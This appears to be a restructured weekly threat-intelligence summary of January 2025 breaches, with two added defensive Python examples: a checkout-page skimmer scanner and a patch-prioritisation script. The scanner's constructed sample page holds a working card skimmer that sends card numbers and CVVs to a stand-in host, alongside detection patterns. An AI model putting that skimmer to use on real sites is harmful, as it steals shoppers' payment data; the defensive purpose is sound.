Full Report
For the latest discoveries in cyber research for the week of 13th January, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES The International Civil Aviation Organization (ICAO), which is part of the UN, confirmed a compromise of its recruitment database that exposed 42,000 recruitment applications. The data contains records from April 2016 to […] The post 13th January – Threat Intelligence Report appeared first on Check Point Research.
Analysis Summary
# Incident Report: Summary of Security Incidents (Week of January 13th)
## Executive Summary
This summary details several high-profile security breaches occurring across various sectors, including breaches impacting a UN agency (ICAO), government entities (Argentina PSA, Slovakia UGKK), and numerous private organizations via ransomware and web application compromises. The incidents highlight significant risks associated with third-party dependencies, ransomware activity (Everest, RansomHub, FunkSec), and active exploitation of newly disclosed vulnerabilities.
## Incident Details
- **Discovery Date:** Ongoing (Report covers incidents reported around the week of January 13th, 2025)
- **Incident Date:** Varies by incident; most occurred in late 2024, though the exposed ICAO records date back to April 2016.
- **Affected Organization:** International Civil Aviation Organization (ICAO), Argentina PSA, UGKK (Slovakia), Telefónica, STIIIZY, BayMark Health Services, Nodex (ISP), Green Bay Packers Online Store.
- **Sector:** Aviation/UN Agencies, Government/Law Enforcement, Land Registry, Telecommunications, E-commerce/Cannabis Vendor, Healthcare Services, Internet Service Provider, Sports Retail.
- **Geography:** Global (ICAO), Argentina, Slovakia, Spain, Russia (Nodex), US.
## Timeline of Events
*(Note: Specific dates vary widely based on the source article. The timeline reflects the discovery/reporting period for these incidents.)*
### Initial Access
- **Date:** Varies (e.g., Sept–Oct 2024 for Green Bay Packers; Oct–Nov 2024 for STIIIZY)
- **Vector:** Third-party service compromise (STIIIZY), Vulnerability exploitation (Argentina PSA via Banco Nación systems), Ransomware activity (BayMark, Telefónica, UGKK), Malicious code injection (Green Bay Packers checkout page).
- **Details:**
* **STIIIZY:** Compromise occurred via a 3rd party point-of-sale processing service.
* **Green Bay Packers:** Malicious code injected into the online store checkout page.
* **Argentina PSA:** Attackers exploited a vulnerability in Banco Nación's systems used to process PSA payroll.
* **UGKK:** Believed victim of an undisclosed ransomware group.
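The checkout-page injection described above (Magecart-style skimming) is the one vector in this batch that a store can check for directly. As an added example that is not Check Point's code, the Python script below scans a page's `<script>` blocks for the combination a skimmer needs: reading card-field values and sending them to a host outside an allowlist, or loading script from a non-allowlisted origin at all. The HTML sample, the allowlisted hosts and the regex heuristics are constructed for the example; in practice this would run against the served checkout page (or a DOM snapshot) on a schedule and alert on any new finding.

```python
"""Heuristic scan of a checkout page for Magecart-style card skimmers.

Added example (not Check Point's or any vendor's code). It flags <script>
blocks that load from outside an allowlist, or that both read payment
fields and send data to a non-allowlisted host. The HTML and host names
below are constructed for the example.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Hosts the store legitimately talks to on checkout (assumed for the example).
ALLOWED_HOSTS = {"shop.example", "payments.example"}

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r"""src\s*=\s*["']([^"']+)["']""", re.I)
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""")
# Field names a skimmer reads, and the APIs it uses to send them out.
CARD_FIELD_RE = re.compile(r"card\s*number|cardnumber|cc[-_]?num|cvv|cvc|expir", re.I)
EXFIL_RE = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|new\s+Image)\b")
OBFUSCATION_RE = re.compile(r"\b(atob|btoa|unescape|String\.fromCharCode)\b")


@dataclass
class Finding:
    index: int                # position of the <script> block in the page
    reasons: list = field(default_factory=list)


def external_hosts(text):
    """Hosts referenced by URL in a script body that are not allowlisted."""
    hosts = set()
    for url in URL_RE.findall(text):
        host = urlparse(url).hostname
        if host and host not in ALLOWED_HOSTS:
            hosts.add(host)
    return hosts


def scan_checkout_html(html):
    """Return a Finding for every suspicious <script> block, in page order."""
    findings = []
    for i, (attrs, body) in enumerate(SCRIPT_RE.findall(html)):
        reasons = []
        src = SRC_RE.search(attrs)
        if src:
            host = urlparse(src.group(1)).hostname
            if host and host not in ALLOWED_HOSTS:
                reasons.append(f"external script src: {host}")
        reads_cards = bool(CARD_FIELD_RE.search(body))
        ext = external_hosts(body)
        if reads_cards and EXFIL_RE.search(body) and ext:
            reasons.append(f"reads card fields and sends to {sorted(ext)}")
        if reads_cards and OBFUSCATION_RE.search(body):
            reasons.append("card field access combined with string obfuscation")
        if reasons:
            findings.append(Finding(i, reasons))
    return findings


# Constructed checkout page: a legitimate payment SDK, a harmless inline
# script, a third-party analytics tag, and an injected skimmer.
SAMPLE_HTML = """
<html><body>
<form id="checkout">
  <input id="cardNumber" name="cardNumber"><input id="cvv" name="cvv">
</form>
<script src="https://payments.example/sdk.js"></script>
<script>
  window.PaymentsSDK.mount('#card-element', {key: 'pk_live_placeholder'});
</script>
<script src="https://analytics.example.org/tag.js"></script>
<script>
document.getElementById('checkout').addEventListener('submit', function () {
  var d = {n: document.getElementById('cardNumber').value,
           c: document.getElementById('cvv').value};
  new Image().src = 'https://cdn-stats.example.net/p.gif?d=' + btoa(JSON.stringify(d));
});
</script>
</body></html>
"""

if __name__ == "__main__":
    for f in scan_checkout_html(SAMPLE_HTML):
        print(f"script #{f.index}: " + "; ".join(f.reasons))
```

Run as-is, the scanner reports two of the four scripts: the analytics tag (external origin on a payment page, worth a review even if benign) and the skimmer (card-field reads, an image-beacon exfiltration to a non-allowlisted host, and `btoa` encoding). The allowed-host check is deliberately strict; a Content-Security-Policy with the same allowlist would stop the exfiltration outright, and this scan is the detective control that tells you the policy is still needed.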
### Lateral Movement
- **Not explicitly detailed for all, but implied in complex ransomware/espionage cases:**
* **BayMark & RansomHub:** Implied multi-stage access to exfiltrate 1.5 TB of data.
* **China Espionage Groups:** Exploited Ivanti Connect Secure CVE-2025-0282 on edge VPN appliances, a foothold that implies subsequent internal network exploration.
### Data Exfiltration/Impact
- **ICAO:** Exposure of 42,000 recruitment applications (names, emails, DOB, employment history from 2016–2024).
- **BayMark:** Exfiltration of 1.5 TB of data, including PII, SSNs, DOBs, and insurance information.
- **STIIIZY:** Extraction of personal data and IDs of 422,075 customers.
- **Telefónica:** Leak of 2.3 GB of documents, ticketing data, and internal files from the ticketing system.
- **Green Bay Packers:** Theft of payment card information from over 8,500 customers.
- **UGKK (Slovakia):** Loss of availability for the land ownership database due to ransomware.
- **Nodex (Russia):** Complete destruction of the ISP's network, dropping its traffic to zero.
### Detection & Response
- **Mode of Discovery:** Data leaks on hacking forums (Telefónica), confirmation by the affected organization (ICAO), and vendor/CISA advisories for actively exploited vulnerabilities (Ivanti CVE-2025-0282).
- **Actions:** Mozilla released Firefox 134 to patch high-severity issues. SonicWall urged firmware updates for CVE-2024-53704 (SonicOS SSL VPN authentication bypass). CISA required federal agencies to patch the Ivanti vulnerability by a fixed deadline.
## Attack Methodology
- **Initial Access:** Third-party compromise, vulnerability exploitation (e.g., Banco Nación systems, Ivanti VPN appliances), ransomware deployment with an undisclosed entry vector, and JavaScript/malicious code injection (Magecart style).
- **Persistence:** Not explicitly detailed, but implied by data exfiltration occurring over extended periods (BayMark: Sept 24–Oct 14, 2024).
- **Privilege Escalation:** Not detailed, but likely necessary for large-scale exfiltration (BayMark).
- **Defense Evasion:** Banshee macOS stealer mimicked Apple’s XProtect antivirus engine. FunkSec utilizes AI-assisted malware development.
- **Credential Access:** Not confirmed for these breaches; stolen credentials or phishing are possible, and the bulletin separately notes a phishing campaign linked to the Riya travel agency.
- **Discovery:** Unknown, except for threats like Banshee which perform reconnaissance to steal specific data types (browser credentials, wallets).
- **Lateral Movement:** Unspecified for most, but necessary to breach large internal databases (ICAO, BayMark).
- **Collection:** Targeted theft of HR/Recruitment data (ICAO), PII/SSNs/Insurance data (BayMark), and payment card data (Packers).
- **Exfiltration:** Data theft by ransomware groups (RansomHub, Everest) and a leaked ticketing-system dump posted to a hacking forum (Telefónica).
- **Impact:** Operational shutdown (UGKK, Nodex), data theft/disclosure.
## Impact Assessment
- **Financial:** Unknown costs associated with remediation, though system destruction (Nodex) implies significant capital loss.
- **Data Breach:** High volume PII: ~42,000 recruitment profiles (ICAO); ~422k customer PII/IDs (STIIIZY); 1.5 TB PII/SSNs (BayMark); 8,500+ payment cards (Packers).
- **Operational:** Severe service disruption—UGKK land database availability impacted; Nodex network completely destroyed.
- **Reputational:** Negative press for major UN body (ICAO) and national security organizations (Argentina PSA).
## Indicators of Compromise
*(Note: Specific IOCs are not provided in the summary text, only threat actor/malware names linked to protection signatures.)*
- **Network indicators:** None provided.
- **File indicators:** Ransomware signatures noted: Ransomware.Win.RansomHub; Ransomware.Wins.RansomHub.ta.*; Ransomware.Wins.Funksec.A.
- **Behavioral indicators:** Active exploitation of Ivanti CVE-2025-0282 by Chinese espionage groups (UNC5221/SPAWN malware family). Banshee macOS Stealer mimicking XProtect behavior.
## Response Actions
- **Containment:** Not detailed in the bulletin for any of the affected organizations.
- **Eradication:** Security patching by Mozilla, SonicWall, and MediaTek addressing high/critical vulnerabilities. CISA mandated emergency patching for Ivanti appliances.
- **Recovery:** Unknown for infrastructure destruction (Nodex) or database compromise (UGKK). Organizations like ICAO are dealing with historical data exposure.
## Lessons Learned
- Historical data retention presents ongoing risk (ICAO data from 2016 exposed).
- Third-party dependencies introduce significant risk, as evidenced by the STIIIZY breach via a POS processor.
- Rapid ransomware evolution, potentially leveraging AI (FunkSec), challenges traditional defensive postures.
- Newly disclosed, high-severity vulnerabilities in edge devices (e.g., Ivanti CVE-2025-0282) are exploited by sophisticated actors before or immediately after disclosure, so patching windows are measured in days, not weeks.
## Recommendations
- Review and aggressively patch *all* disclosed vulnerabilities, especially those actively exploited (e.g., Ivanti).
- Implement stringent security auditing and segmentation for all critical third-party service providers, particularly those handling financial or PII data (e.g., POS systems).
- Enhance endpoint detection for suspicious behavior, specifically targeting defense evasion techniques used by advanced malware (like Banshee masking as an AV).
- Review policies regarding long-term retention of highly sensitive PII/personnel data.
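The patching recommendation above is only actionable if you can tell which assets are actually below a fixed version and which of those are exposed. As an added example that is not Check Point's or CISA's code, the Python below cross-references a constructed asset inventory against a constructed KEV-style catalog (vendor, product, first fixed version, remediation due date) and ranks what to patch first by internet exposure and deadline. Vendor names, product names, version numbers and the `SAMPLE-CVE-*` identifiers are all placeholders invented for the example; in practice the inputs are the real CISA KEV feed and a CMDB export.

```python
"""Rank assets for patching against a KEV-style catalog of exploited bugs.

Added example (not Check Point's or CISA's code). Inventory, catalog,
vendor/product names, versions and the SAMPLE-CVE-* identifiers are all
constructed placeholders.
"""
from dataclasses import dataclass
from datetime import date


@dataclass(frozen=True)
class KevEntry:
    cve: str
    vendor: str
    product: str
    fixed_version: str   # first version that is not vulnerable
    due: date            # remediation deadline from the catalog


@dataclass(frozen=True)
class Asset:
    host: str
    vendor: str
    product: str
    version: str
    internet_facing: bool


def parse_version(text):
    """'7.10.0' -> (7, 10, 0). Compare numerically: as strings '7.10.0' < '7.9.0'."""
    return tuple(int(p) for p in text.split("."))


def priority(asset, entry, today):
    """P1: past due and reachable from the internet; P2: one of the two; P3: neither."""
    overdue = today > entry.due
    if overdue and asset.internet_facing:
        return "P1"
    if overdue or asset.internet_facing:
        return "P2"
    return "P3"


def find_exposed(assets, catalog, today):
    """(asset, entry, priority) for each asset still below an entry's fixed version."""
    hits = []
    for asset in assets:
        for entry in catalog:
            if (asset.vendor, asset.product) != (entry.vendor, entry.product):
                continue
            if parse_version(asset.version) < parse_version(entry.fixed_version):
                hits.append((asset, entry, priority(asset, entry, today)))
    hits.sort(key=lambda h: (h[2], h[1].due, h[0].host))
    return hits


# Constructed data: placeholder vendors, products, versions and identifiers.
CATALOG = [
    KevEntry("SAMPLE-CVE-1", "vendor-a", "ssl-vpn", "9.2.0", date(2025, 1, 15)),
    KevEntry("SAMPLE-CVE-2", "vendor-b", "firewall-os", "7.9.0", date(2025, 2, 1)),
]
ASSETS = [
    Asset("vpn-edge-01", "vendor-a", "ssl-vpn", "9.1.4", True),         # exposed, overdue
    Asset("vpn-lab-01", "vendor-a", "ssl-vpn", "9.2.0", False),         # already fixed
    Asset("fw-dc-01", "vendor-b", "firewall-os", "7.8.2", False),       # internal, not yet due
    Asset("fw-branch-03", "vendor-b", "firewall-os", "7.10.0", True),   # newer than the fix
]
AS_OF = date(2025, 1, 20)


def run_sample():
    """Evaluate the constructed inventory as of AS_OF."""
    return find_exposed(ASSETS, CATALOG, AS_OF)


if __name__ == "__main__":
    for asset, entry, pri in run_sample():
        print(f"{pri} {asset.host}: {entry.cve} running {asset.version}, "
              f"fixed in {entry.fixed_version}, due {entry.due}")
```

Two details matter more than the scoring. Versions are compared as integer tuples, because a string comparison would rank `7.10.0` below `7.9.0` and report a patched firewall as vulnerable (or, with the inequality reversed, hide an unpatched one). And exposure comes from the inventory, not the catalog: the same CVE on an internet-facing VPN concentrator and on a lab box gets very different priorities, which is exactly the distinction the Ivanti cases above turn on.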